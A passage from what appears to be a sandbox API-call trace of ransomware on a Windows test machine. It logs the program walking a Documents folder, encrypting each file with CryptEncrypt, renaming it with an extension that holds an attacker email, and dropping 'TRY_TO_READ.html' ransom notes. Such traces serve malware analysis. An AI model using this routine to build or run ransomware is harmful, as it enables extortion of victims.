out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.828] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.829] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.830] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.832] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x46a8) returned 0x4dab68 [0120.832] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x46a8) returned 0x4df218 [0120.832] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.832] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x46a8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x46a8, lpOverlapped=0x0) returned 1 [0120.832] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-18088, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.832] WriteFile (in: hFile=0x4a8, lpBuffer=0x4df218*, nNumberOfBytesToWrite=0x46a8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4df218*, lpNumberOfBytesWritten=0x367f44c*=0x46a8, lpOverlapped=0x0) returned 1 [0120.833] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x46a8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.833] CloseHandle (hObject=0x4a8) returned 1 [0120.834] GetProcessHeap () returned 0x410000 [0120.834] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.834] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kdnmmbpfn.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kdnmmbpfn.xlsx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.836] GetProcessHeap () returned 0x410000 [0120.837] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.837] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98de5f50, ftCreationTime.dwHighDateTime=0x1d5e193, ftLastAccessTime.dwLowDateTime=0xd6c6a3a0, ftLastAccessTime.dwHighDateTime=0x1d5d8ff, ftLastWriteTime.dwLowDateTime=0xd6c6a3a0, ftLastWriteTime.dwHighDateTime=0x1d5d8ff, nFileSizeHigh=0x0, nFileSizeLow=0x122eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KZE7P.pps", cAlternateFileName="")) returned 1 [0120.837] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kze7p.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.837] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.837] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x122eb, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.837] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.837] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.838] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.838] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.838] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.838] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.838] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps", dwFileAttributes=0x80) returned 1 [0120.838] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps") returned 50 [0120.838] GetProcessHeap () returned 0x410000 [0120.838] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4) returned 0x460008 [0120.838] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps" [0120.838] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.838] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=74475) returned 1 [0120.839] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x122eb [0120.839] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.839] GetProcessHeap () returned 0x410000 [0120.839] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.839] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.839] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.841] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.843] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.843] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x122eb) returned 0xf50048 [0120.844] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x122eb) returned 0xf62340 [0120.845] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.845] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x122eb, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x122eb, lpOverlapped=0x0) returned 1 [0120.847] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-74475, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.847] WriteFile (in: hFile=0x4a8, lpBuffer=0xf62340*, nNumberOfBytesToWrite=0x122eb, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf62340*, lpNumberOfBytesWritten=0x367f44c*=0x122eb, lpOverlapped=0x0) returned 1 [0120.848] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x122eb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.849] CloseHandle (hObject=0x4a8) returned 1 [0120.849] GetProcessHeap () returned 0x410000 [0120.849] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.849] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kze7p.pps"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KZE7P.pps.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kze7p.pps.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.852] GetProcessHeap () returned 0x410000 [0120.852] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.852] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a70ad20, ftCreationTime.dwHighDateTime=0x1d5d058, ftLastAccessTime.dwLowDateTime=0xfad13830, ftLastAccessTime.dwHighDateTime=0x1d58f87, ftLastWriteTime.dwLowDateTime=0xfad13830, ftLastWriteTime.dwHighDateTime=0x1d58f87, nFileSizeHigh=0x0, nFileSizeLow=0x13ace, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LJNRoFrLG_4Q.docx", cAlternateFileName="LJNROF~1.DOC")) returned 1 [0120.852] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ljnrofrlg_4q.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.852] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.852] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13ace, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.852] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.852] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.853] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.853] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.853] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.853] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.853] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx", dwFileAttributes=0x80) returned 1 [0120.853] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx") returned 58 [0120.853] GetProcessHeap () returned 0x410000 [0120.853] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0120.853] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx" [0120.854] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.854] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=80590) returned 1 [0120.854] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x13ace [0120.854] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.854] GetProcessHeap () returned 0x410000 [0120.854] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.854] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.856] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.857] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.858] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.859] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13ace) returned 0xf50048 [0120.860] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13ace) returned 0xf63b20 [0120.860] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.860] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x13ace, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x13ace, lpOverlapped=0x0) returned 1 [0120.864] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13ace, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.864] CloseHandle (hObject=0x4a8) returned 1 [0120.865] GetProcessHeap () returned 0x410000 [0120.865] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.865] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ljnrofrlg_4q.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LJNRoFrLG_4Q.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ljnrofrlg_4q.docx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.870] GetProcessHeap () returned 0x410000 [0120.870] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.871] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0120.871] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.872] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0120.872] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.873] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0120.873] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.876] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0120.876] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.878] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee5da000, ftCreationTime.dwHighDateTime=0x1d5db1f, ftLastAccessTime.dwLowDateTime=0xefb50b00, ftLastAccessTime.dwHighDateTime=0x1d56ef5, ftLastWriteTime.dwLowDateTime=0xefb50b00, ftLastWriteTime.dwHighDateTime=0x1d56ef5, nFileSizeHigh=0x0, nFileSizeLow=0x16686, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NYkJc74qVWOfQHxvUyJW.pptx", cAlternateFileName="NYKJC7~1.PPT")) returned 1 [0120.878] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nykjc74qvwofqhxvuyjw.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.878] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.878] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16686, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.878] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.878] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.879] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.879] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.879] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.879] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.879] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx", dwFileAttributes=0x80) returned 1 [0120.879] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx") returned 66 [0120.879] GetProcessHeap () returned 0x410000 [0120.879] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf4) returned 0x43a4a0 [0120.879] lstrcpyW (in: lpString1=0x43a4a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx" [0120.879] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.879] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=91782) returned 1 [0120.879] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x16686 [0120.879] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.880] GetProcessHeap () returned 0x410000 [0120.880] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.880] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.881] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.883] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.884] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.885] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16686) returned 0xf50048 [0120.886] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16686) returned 0xf666d8 [0120.886] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 